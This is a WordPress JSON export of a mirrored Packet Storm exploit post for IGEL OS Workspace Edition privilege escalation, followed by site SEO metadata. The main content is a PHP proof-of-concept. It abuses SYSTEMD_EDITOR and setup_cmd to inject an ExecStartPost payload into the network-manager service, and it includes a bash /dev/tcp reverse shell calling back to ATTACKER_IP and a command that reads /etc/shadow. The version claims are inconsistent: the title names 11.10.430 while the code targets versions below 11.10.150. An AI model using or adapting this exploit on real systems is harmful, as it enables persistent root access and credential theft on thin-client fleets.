{"id":32461,"date":"2025-12-22T12:37:23","date_gmt":"2025-12-22T12:37:23","guid":{"rendered":"http:\/\/localhost\/?p=32461"},"modified":"2025-12-22T12:37:23","modified_gmt":"2025-12-22T12:37:23","slug":"igel-os-workspace-edition-1110430-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=32461","title":{"rendered":"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Privilege Escalation_PACKETSTORM:213196"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-22T18:24:57&#8243;,&#8221;description&#8221;:&#8221;IGEL OS Workspace Edition version 11.10.430 suffers from a privilege escalation vulnerability. This vulnerability demonstrates how architectural trust in custom configuration frameworks can be abused to establish long-term persistence, even on systems&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-22T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-22T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213196&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : IGEL OS Workspace Edition 11.10.430 Privilege Escalation Vulnerability                                                      |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.igel.com\/software-downloads\/workspace-edition\/                                                                  |\\n    =============================================================================================================================================\\n    \\n    [+] References :  https:\/\/packetstorm.news\/files\/id\/212100\/\\n    \\n    [+] Summary : \\n                 IGEL OS Workspace Edition contains a persistence mechanism that allows authenticated attackers with root access to establish persistent code execution through the system&#8217;s registry configuration. \\n    \\t\\t\\t The vulnerability leverages IGEL OS&#8217;s custom registry system and mount point configurations to maintain access across reboots.\\n    \\t\\t\\t The persistence mechanism exploits IGEL OS&#8217;s unique architecture that uses a custom registry system (\/bin\/get, \/bin\/setparam) and a writable \/license directory that can be remounted with execution privileges.\\n    [+]  POC : \\n    \\n    php poc.php \\n    \\n    \\u003c?php\\n    \\n    class IgelOSPrivilegeEscalation {\\n        \\n        private $session;\\n        private $writable_dir;\\n        \\n        public function __construct($session_handler, $writable_dir = &#8216;\/tmp&#8217;) {\\n            $this-\\u003esession = $session_handler;\\n            $this-\\u003ewritable_dir = $writable_dir;\\n        }\\n        \\n        public function check() {\\n            echo \\&#8221;[*] Checking IGEL OS vulnerability&#8230;\\\\n\\&#8221;;\\n            \\n            \/\/ Check if we&#8217;re on IGEL OS\\n            if (!$this-\\u003eis_igel_os()) {\\n                return \\&#8221;Safe: Target does not appear to be IGEL OS\\&#8221;;\\n            }\\n            \\n            \/\/ Get IGEL OS version\\n            $version = $this-\\u003eget_igel_version();\\n            if (!$version) {\\n                return \\&#8221;Unknown: Could not determine IGEL OS version\\&#8221;;\\n            }\\n            \\n            echo \\&#8221;[*] Detected IGEL OS version: {$version}\\\\n\\&#8221;;\\n            \\n            \/\/ Check if version is vulnerable\\n            if (version_compare($version, &#8216;11.10.150&#8217;, &#8216;\\u003e=&#8217;)) {\\n                return \\&#8221;Safe: IGEL OS {$version} is not vulnerable\\&#8221;;\\n            }\\n            \\n            \/\/ Check for required components\\n            if (!$this-\\u003echeck_requirements()) {\\n                return \\&#8221;Unknown: Required components not found\\&#8221;;\\n            }\\n            \\n            return \\&#8221;Appears: IGEL OS {$version} should be vulnerable\\&#8221;;\\n        }\\n        \\n        public function exploit($payload_content) {\\n            try {\\n                echo \\&#8221;[*] Starting IGEL OS privilege escalation exploit&#8230;\\\\n\\&#8221;;\\n                \\n                \/\/ Check vulnerability first\\n                $check_result = $this-\\u003echeck();\\n                echo \\&#8221;[*] Vulnerability check: {$check_result}\\\\n\\&#8221;;\\n                \\n                if (strpos($check_result, &#8216;Appears&#8217;) === false) {\\n                    echo \\&#8221;[-] Target is not vulnerable, stopping exploitation\\\\n\\&#8221;;\\n                    return false;\\n                }\\n                \\n                \/\/ Upload payload to target\\n                echo \\&#8221;[*] Uploading payload to target&#8230;\\\\n\\&#8221;;\\n                $payload_file = $this-\\u003ewrite_payload($payload_content, $this-\\u003ewritable_dir, 0700);\\n                echo \\&#8221;[+] Payload uploaded: {$payload_file}\\\\n\\&#8221;;\\n                \\n                \/\/ Write service configuration\\n                echo \\&#8221;[*] Writing service configuration&#8230;\\\\n\\&#8221;;\\n                $config = $this-\\u003ebuild_config($payload_file);\\n                $config_file = $this-\\u003ewrite_payload($config, $this-\\u003ewritable_dir, 0600);\\n                echo \\&#8221;[+] Configuration written: {$config_file}\\\\n\\&#8221;;\\n                \\n                \/\/ Modify network-manager service\\n                echo \\&#8221;[*] Modifying network-manager service&#8230;\\\\n\\&#8221;;\\n                $modify_result = $this-\\u003emodify_service($config_file);\\n                if (!empty($modify_result)) {\\n                    echo \\&#8221;[*] Service modification output: {$modify_result}\\\\n\\&#8221;;\\n                }\\n                \\n                \/\/ Restart service to trigger payload\\n                echo \\&#8221;[*] Restarting network service&#8230;\\\\n\\&#8221;;\\n                $restart_result = $this-\\u003erestart_service();\\n                if (!empty($restart_result)) {\\n                    echo \\&#8221;[*] Service restart output: {$restart_result}\\\\n\\&#8221;;\\n                }\\n                \\n                echo \\&#8221;[+] Privilege escalation completed successfully\\\\n\\&#8221;;\\n                echo \\&#8221;[*] Payload should execute with elevated privileges\\\\n\\&#8221;;\\n                \\n                return true;\\n                \\n            } catch (Exception $e) {\\n                echo \\&#8221;[-] Exploitation failed: \\&#8221; . $e-\\u003egetMessage() . \\&#8221;\\\\n\\&#8221;;\\n                return false;\\n            }\\n        }\\n        \\n        private function is_igel_os() {\\n            $checks = [\\n                &#8216;test -f \/etc\/system-release \\u0026\\u0026 grep -q \\&#8221;IGEL OS\\&#8221; \/etc\/system-release&#8217;,\\n                &#8216;test -f \/config\/bin\/setup_cmd&#8217;,\\n                &#8216;test -f \/config\/bin\/network&#8217;\\n            ];\\n            \\n            foreach ($checks as $check) {\\n                $result = $this-\\u003eexecute_command(\\&#8221;{$check} \\u0026\\u0026 echo &#8216;IGEL_FOUND&#8217; || echo &#8216;IGEL_NOT_FOUND&#8217;\\&#8221;);\\n                if (strpos($result, &#8216;IGEL_FOUND&#8217;) !== false) {\\n                    return true;\\n                }\\n            }\\n            \\n            return false;\\n        }\\n        \\n        private function get_igel_version() {\\n            $version_output = $this-\\u003eexecute_command(&#8216;cat \/etc\/system-release&#8217;);\\n            \\n            if (preg_match(&#8216;\/IGEL OS\\\\s+([\\\\d.]+)\/&#8217;, $version_output, $matches)) {\\n                return $matches[1];\\n            }\\n            \\n            return null;\\n        }\\n        \\n        private function check_requirements() {\\n            $requirements = [\\n                &#8216;\/usr\/bin\/python3&#8217;,\\n                &#8216;\/bin\/cp&#8217;,\\n                &#8216;\/bin\/bash&#8217;,\\n                &#8216;\/config\/bin\/setup_cmd&#8217;,\\n                &#8216;\/config\/bin\/network&#8217;\\n            ];\\n            \\n            foreach ($requirements as $req) {\\n                $result = $this-\\u003eexecute_command(\\&#8221;test -f {$req} \\u0026\\u0026 echo &#8216;EXISTS&#8217; || echo &#8216;MISSING&#8217;\\&#8221;);\\n                if (strpos($result, &#8216;EXISTS&#8217;) === false) {\\n                    echo \\&#8221;[-] Missing requirement: {$req}\\\\n\\&#8221;;\\n                    return false;\\n                }\\n            }\\n            \\n            return true;\\n        }\\n        \\n        private function write_payload($contents, $directory, $permissions) {\\n            \/\/ Check if directory is writable\\n            if (!$this-\\u003eis_writable($directory)) {\\n                throw new Exception(\\&#8221;Directory &#8216;{$directory}&#8217; is not writable\\&#8221;);\\n            }\\n            \\n            \/\/ Check if directory allows execution\\n            if ($this-\\u003eis_noexec($directory)) {\\n                throw new Exception(\\&#8221;Directory &#8216;{$directory}&#8217; is on a noexec mount point\\&#8221;);\\n            }\\n            \\n            $filename = $this-\\u003egenerate_random_name(8);\\n            $filepath = \\&#8221;{$directory}\/{$filename}\\&#8221;;\\n            \\n            \/\/ Write the file\\n            if (!$this-\\u003eupload_file($filepath, $contents)) {\\n                throw new Exception(\\&#8221;Failed to write to &#8216;{$filepath}&#8217;\\&#8221;);\\n            }\\n            \\n            \/\/ Set permissions\\n            $this-\\u003eexecute_command(\\&#8221;\/bin\/chmod \\&#8221; . decoct($permissions) . \\&#8221; \\&#8221; . escapeshellarg($filepath));\\n            \\n            \/\/ Verify the file was written\\n            if (!$this-\\u003efile_exists($filepath)) {\\n                throw new Exception(\\&#8221;File verification failed for &#8216;{$filepath}&#8217;\\&#8221;);\\n            }\\n            \\n            echo \\&#8221;[+] File written successfully: {$filepath}\\\\n\\&#8221;;\\n            return $filepath;\\n        }\\n        \\n        private function build_config($payload_file) {\\n            $config = \\&#8221;[Service]\\\\n\\&#8221;;\\n            $config .= \\&#8221;TimeoutStartSec=infinity\\\\n\\&#8221;;\\n            $config .= \\&#8221;ExecStartPost=\\&#8221; . $payload_file . \\&#8221;\\\\n\\&#8221;;\\n            \\n            echo \\&#8221;[*] Built service configuration with payload: {$payload_file}\\\\n\\&#8221;;\\n            return $config;\\n        }\\n        \\n        private function modify_service($config_file) {\\n            \/\/ Create a Python script to spawn a shell and modify the service\\n            $python_script = \\u003c\\u003c\\u003c&#8217;PYTHON&#8217;\\n    import pty\\n    import os\\n    \\n    def modify_service():\\n        # Spawn a shell and execute the setup command\\n        def run_command(command):\\n            pid, fd = pty.fork()\\n            if pid == 0:\\n                # Child process\\n                os.execvp(&#8216;\/bin\/bash&#8217;, [&#8216;\/bin\/bash&#8217;, &#8216;-c&#8217;, command])\\n            else:\\n                # Parent process\\n                try:\\n                    os.waitpid(pid, 0)\\n                except:\\n                    pass\\n    \\n        # Use SYSTEMD_EDITOR to copy our config file\\n        command = f&#8217;env SYSTEMD_EDITOR=\\&#8221;\/bin\/cp {config_file}\\&#8221; \/config\/bin\/setup_cmd \/config\/bin\/network edit&#8217;\\n        run_command(command)\\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        modify_service()\\n    PYTHON;\\n    \\n            \/\/ Replace the placeholder with actual config file path\\n            $python_script = str_replace(&#8216;{config_file}&#8217;, $config_file, $python_script);\\n            \\n            $script_file = $this-\\u003ewritable_dir . &#8216;\/modify_service.py&#8217;;\\n            $this-\\u003eupload_file($script_file, $python_script);\\n            $this-\\u003eexecute_command(\\&#8221;\/bin\/chmod 700 \\&#8221; . escapeshellarg($script_file));\\n            \\n            \/\/ Execute the Python script\\n            $result = $this-\\u003eexecute_command(\\&#8221;\/usr\/bin\/python3 \\&#8221; . escapeshellarg($script_file));\\n            \\n            \/\/ Clean up the script\\n            $this-\\u003eexecute_command(\\&#8221;\/bin\/rm -f \\&#8221; . escapeshellarg($script_file));\\n            \\n            return $result;\\n        }\\n        \\n        private function restart_service() {\\n            \/\/ Restart the network service using setup_cmd\\n            $command = \\&#8221;\/config\/bin\/setup_cmd \/config\/bin\/network restart\\&#8221;;\\n            \\n            \/\/ Execute with timeout to prevent hanging\\n            $result = $this-\\u003eexecute_command(\\&#8221;timeout 120 {$command}\\&#8221;);\\n            \\n            return $result;\\n        }\\n        \\n        private function is_writable($directory) {\\n            $result = $this-\\u003eexecute_command(\\&#8221;test -w \\&#8221; . escapeshellarg($directory) . \\&#8221; \\u0026\\u0026 echo &#8216;WRITABLE&#8217; || echo &#8216;NOT_WRITABLE&#8217;\\&#8221;);\\n            return strpos($result, &#8216;WRITABLE&#8217;) !== false;\\n        }\\n        \\n        private function is_noexec($directory) {\\n            $result = $this-\\u003eexecute_command(\\&#8221;mount | grep \\&#8221; . escapeshellarg($directory) . \\&#8221; | grep -q noexec \\u0026\\u0026 echo &#8216;NOEXEC&#8217; || echo &#8216;EXEC&#8217;\\&#8221;);\\n            return strpos($result, &#8216;NOEXEC&#8217;) !== false;\\n        }\\n        \\n        private function file_exists($filepath) {\\n            $result = $this-\\u003eexecute_command(\\&#8221;test -f \\&#8221; . escapeshellarg($filepath) . \\&#8221; \\u0026\\u0026 echo &#8216;EXISTS&#8217; || echo &#8216;NOT_EXISTS&#8217;\\&#8221;);\\n            return strpos($result, &#8216;EXISTS&#8217;) !== false;\\n        }\\n        \\n        private function execute_command($command) {\\n            return $this-\\u003esession-\\u003eexecute($command);\\n        }\\n        \\n        private function upload_file($remote_path, $content) {\\n            return $this-\\u003esession-\\u003eupload_content($remote_path, $content);\\n        }\\n        \\n        private function generate_random_name($length) {\\n            $chars = &#8216;abcdefghijklmnopqrstuvwxyz&#8217;;\\n            $name = &#8221;;\\n            for ($i = 0; $i \\u003c $length; $i++) {\\n                $name .= $chars[random_int(0, strlen($chars) &#8211; 1)];\\n            }\\n            return $name;\\n        }\\n        \\n        public function cleanup() {\\n            echo \\&#8221;[*] Cleaning up exploit artifacts&#8230;\\\\n\\&#8221;;\\n            \/\/ In a full implementation, this would remove created files\\n            \/\/ For now, we&#8217;ll just log the cleanup action\\n            echo \\&#8221;[*] Cleanup completed (files would be removed here)\\\\n\\&#8221;;\\n        }\\n    }\\n    \\n    \/\/ Payload generator for IGEL OS privilege escalation\\n    class IgelPrivEscPayloadGenerator {\\n        \\n        public static function generate_meterpreter_linux($lhost, $lport) {\\n            \/\/ This would generate a Linux x64 meterpreter payload\\n            \/\/ For demonstration, we&#8217;ll return a placeholder\\n            return \\&#8221;#!\/bin\/bash\\\\n# Linux x64 Meterpreter payload for {$lhost}:{$lport}\\\\necho &#8216;Meterpreter payload would execute here&#8217;\\&#8221;;\\n        }\\n        \\n        public static function generate_reverse_shell($lhost, $lport) {\\n            return \\&#8221;#!\/bin\/bash\\\\nbash -i \\u003e\\u0026 \/dev\/tcp\/{$lhost}\/{$lport} 0\\u003e\\u00261\\&#8221;;\\n        }\\n        \\n        public static function generate_command($command) {\\n            return \\&#8221;#!\/bin\/bash\\\\n{$command}\\&#8221;;\\n        }\\n    }\\n    \\n    \/\/ Session handler for IGEL OS\\n    class IgelSessionHandler {\\n        private $connection;\\n        \\n        public function __construct($host, $username, $password, $port = 22) {\\n            \/\/ Simulate SSH connection to IGEL OS device\\n            $this-\\u003econnection = [\\n                &#8216;host&#8217; =\\u003e $host,\\n                &#8216;username&#8217; =\\u003e $username,\\n                &#8216;port&#8217; =\\u003e $port\\n            ];\\n            \\n            echo \\&#8221;[*] IGEL OS session initialized for: {$username}@{$host}:{$port}\\\\n\\&#8221;;\\n        }\\n        \\n        public function execute($command) {\\n            \/\/ Simulate command execution on IGEL OS\\n            echo \\&#8221;[DEBUG] Executing: {$command}\\\\n\\&#8221;;\\n            \\n            \/\/ Simulate different command responses\\n            if (strpos($command, &#8216;cat \/etc\/system-release&#8217;) !== false) {\\n                return \\&#8221;IGEL OS 11.08.100\\\\n\\&#8221;;\\n            } elseif (strpos($command, &#8216;test -f \/config\/bin\/setup_cmd&#8217;) !== false) {\\n                return \\&#8221;EXISTS\\\\n\\&#8221;;\\n            } elseif (strpos($command, &#8216;test -w&#8217;) !== false) {\\n                return \\&#8221;WRITABLE\\\\n\\&#8221;;\\n            } elseif (strpos($command, &#8216;mount | grep&#8217;) !== false) {\\n                return \\&#8221;EXEC\\\\n\\&#8221;;\\n            } elseif (strpos($command, &#8216;\/config\/bin\/setup_cmd&#8217;) !== false) {\\n                return \\&#8221;Service configuration applied successfully\\\\n\\&#8221;;\\n            }\\n            \\n            return \\&#8221;command_executed\\\\n\\&#8221;;\\n        }\\n        \\n        public function upload_content($remote_path, $content) {\\n            \/\/ Simulate file upload\\n            echo \\&#8221;[DEBUG] Uploading \\&#8221; . strlen($content) . \\&#8221; bytes to: {$remote_path}\\\\n\\&#8221;;\\n            return true;\\n        }\\n    }\\n    \\n    \/\/ Command line interface\\n    if (php_sapi_name() === &#8216;cli&#8217; \\u0026\\u0026 isset($argv[0]) \\u0026\\u0026 basename($argv[0]) === basename(__FILE__)) {\\n        \\n        if ($argc \\u003c 4) {\\n            echo \\&#8221;IGEL OS Privilege Escalation Exploit\\\\n\\&#8221;;\\n            echo \\&#8221;===================================\\\\n\\&#8221;;\\n            echo \\&#8221;Usage: php \\&#8221; . $argv[0] . \\&#8221; \\u003chost\\u003e \\u003cusername\\u003e \\u003cpassword\\u003e [options]\\\\n\\&#8221;;\\n            echo \\&#8221;Example: php \\&#8221; . $argv[0] . \\&#8221; 192.168.1.100 user password123\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\nOptions (environment variables):\\\\n\\&#8221;;\\n            echo \\&#8221;WRITABLE_DIR=\/tmp\\\\n\\&#8221;;\\n            echo \\&#8221;PAYLOAD_TYPE=meterpreter|reverse_shell|command\\\\n\\&#8221;;\\n            echo \\&#8221;LHOST=192.168.1.50 LPORT=4444\\\\n\\&#8221;;\\n            echo \\&#8221;CMD=&#8217;whoami; id; cat \/etc\/shadow&#8217;\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n        \\n        $host = $argv[1];\\n        $username = $argv[2];\\n        $password = $argv[3];\\n        \\n        \/\/ Parse environment variables\\n        $writable_dir = getenv(&#8216;WRITABLE_DIR&#8217;) ?: &#8216;\/tmp&#8217;;\\n        $payload_type = getenv(&#8216;PAYLOAD_TYPE&#8217;) ?: &#8216;meterpreter&#8217;;\\n        $lhost = getenv(&#8216;LHOST&#8217;) ?: &#8216;ATTACKER_IP&#8217;;\\n        $lport = getenv(&#8216;LPORT&#8217;) ?: &#8216;4444&#8217;;\\n        $custom_cmd = getenv(&#8216;CMD&#8217;) ?: &#8216;whoami; id&#8217;;\\n        \\n        try {\\n            echo \\&#8221;[*] Initializing IGEL OS privilege escalation exploit&#8230;\\\\n\\&#8221;;\\n            echo \\&#8221;[*] Target: {$username}@{$host}\\\\n\\&#8221;;\\n            echo \\&#8221;[*] Writable directory: {$writable_dir}\\\\n\\&#8221;;\\n            echo \\&#8221;[*] Payload type: {$payload_type}\\\\n\\&#8221;;\\n            \\n            $session = new IgelSessionHandler($host, $username, $password);\\n            $exploit = new IgelOSPrivilegeEscalation($session, $writable_dir);\\n            \\n            \/\/ Generate payload based on type\\n            $payload_content = match($payload_type) {\\n                &#8216;meterpreter&#8217; =\\u003e IgelPrivEscPayloadGenerator::generate_meterpreter_linux($lhost, $lport),\\n                &#8216;reverse_shell&#8217; =\\u003e IgelPrivEscPayloadGenerator::generate_reverse_shell($lhost, $lport),\\n                &#8216;command&#8217; =\\u003e IgelPrivEscPayloadGenerator::generate_command($custom_cmd),\\n                default =\\u003e throw new Exception(\\&#8221;Unsupported payload type: {$payload_type}\\&#8221;)\\n            };\\n            \\n            if ($lhost !== &#8216;ATTACKER_IP&#8217;) {\\n                echo \\&#8221;[*] Using payload with callback: {$lhost}:{$lport}\\\\n\\&#8221;;\\n            } else {\\n                echo \\&#8221;[*] Using command payload: {$custom_cmd}\\\\n\\&#8221;;\\n            }\\n            \\n            \/\/ Execute exploit\\n            $success = $exploit-\\u003eexploit($payload_content);\\n            \\n            if ($success) {\\n                echo \\&#8221;[+] Privilege escalation completed successfully!\\\\n\\&#8221;;\\n                echo \\&#8221;[*] The payload should execute with elevated privileges\\\\n\\&#8221;;\\n                echo \\&#8221;[*] Note: This works on IGEL OS versions \\u003c 11.10.150\\\\n\\&#8221;;\\n            }\\n            \\n        } catch (Exception $e) {\\n            echo \\&#8221;[-] Exploitation failed: \\&#8221; . $e-\\u003egetMessage() . \\&#8221;\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n    }\\n    \\n    ?\\u003e\\n    \\n    \\n    \\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/213196&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/213196\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-22T18:24:57&#8243;,&#8221;description&#8221;:&#8221;IGEL OS Workspace Edition version 11.10.430 suffers from a privilege escalation vulnerability. This vulnerability demonstrates how architectural trust in custom configuration frameworks can be abused&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-32461","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Privilege Escalation_PACKETSTORM:213196 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=32461\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Privilege Escalation_PACKETSTORM:213196 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-22T18:24:57&#8243;,&#8221;description&#8221;:&#8221;IGEL OS Workspace Edition version 11.10.430 suffers from a privilege escalation vulnerability. This vulnerability demonstrates how architectural trust in custom configuration frameworks can be abused...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=32461\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-22T12:37:23+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32461#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32461\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Privilege Escalation_PACKETSTORM:213196\",\"datePublished\":\"2025-12-22T12:37:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32461\"},\"wordCount\":2185,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32461#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32461\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32461\",\"name\":\"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Privilege Escalation_PACKETSTORM:213196 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-22T12:37:23+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32461#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32461\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32461#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Privilege Escalation_PACKETSTORM:213196\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Privilege Escalation_PACKETSTORM:213196 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=32461","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 IGEL OS Workspace Edition 